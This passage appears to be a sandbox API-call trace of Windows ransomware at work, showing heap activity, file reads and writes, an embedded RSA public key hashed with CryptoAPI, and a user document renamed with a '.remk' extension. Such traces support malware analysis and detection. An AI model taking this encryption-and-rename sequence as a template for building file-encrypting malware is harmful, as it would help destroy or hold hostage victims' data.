Size=0x558) returned 0x37b5b70 [0235.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0235.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc600 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc5e8 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.963] GetCurrentThreadId () returned 0x314 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c51c0 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.963] GetCurrentThreadId () returned 0x314 [0235.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0235.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0235.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc678 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc618 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0235.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d268 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.969] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x11a07, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x11a07, lpOverlapped=0x0) returned 1 [0235.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.969] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11a0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.969] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.970] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.970] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.970] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.970] CloseHandle (hObject=0x640) returned 1 [0235.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0235.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0235.974] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\q6Xn7lmS sN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\q6xn7lms sn.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\q6Xn7lmS sN.doc.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\q6xn7lms sn.doc.remk")) returned 1 [0235.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.976] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.977] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec24920, ftCreationTime.dwHighDateTime=0x1d5d8bf, ftLastAccessTime.dwLowDateTime=0x9cadd830, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0x9cadd830, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x15521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vES6q7o6drzmc2wswqv.csv", cAlternateFileName="VES6Q7~1.CSV")) returned 1 [0235.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0235.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0235.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0235.977] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\vES6q7o6drzmc2wswqv.csv") returned=".csv" [0235.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\vES6q7o6drzmc2wswqv.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\ves6q7o6drzmc2wswqv.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.979] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=87329) returned 1 [0235.979] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.982] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x154fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.982] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.004] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.004] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x15521, lpOverlapped=0x0) returned 1 [0236.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.006] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.007] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.007] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.007] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.007] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.007] GetLastError () returned 0x0 [0236.007] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.007] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.007] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.007] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.007] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.007] 